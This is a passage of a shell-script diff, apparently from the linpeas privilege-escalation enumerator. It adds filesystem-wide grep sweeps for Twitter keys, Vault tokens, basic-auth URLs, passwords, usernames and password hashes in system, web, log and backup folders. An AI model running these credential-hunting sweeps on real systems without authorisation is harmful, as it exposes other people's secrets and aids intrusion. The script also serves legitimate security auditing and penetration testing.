uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +wait +print_3title "Searching Twitter Client ID (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +wait +print_3title "Searching Twitter Oauth (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +wait +print_3title "Searching Twitter Secret Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "twitter(.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~twitter(.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +wait +print_3title "Searching Vault Token (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[sb]\.[a-zA-Z0-9]{24}" '{}' \; 2>/dev/null | grep -i "vault" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[sb]\.[a-zA-Z0-9]{24}~${SED_RED}~" & +wait +echo '' +print_2title "Searching Misc" +print_3title "Searching Basic Auth (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +wait +print_3title "Searching Passwords1 (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +wait +print_3title "Searching Usernames (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +wait +echo '' - ##-- IF) Find possible files with usernames - print_2title "Finding 'username' string inside key folders (limit 70)" - timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - echo "" - - ##-- IF) Specific hashes inside files - print_2title "Searching specific hashes inside files - less false positives (limit 70)" - regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' - regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' - regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' - regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' - regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' - regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' - regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Specific hashes inside files - print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" - regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' - regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' - regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' - regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else 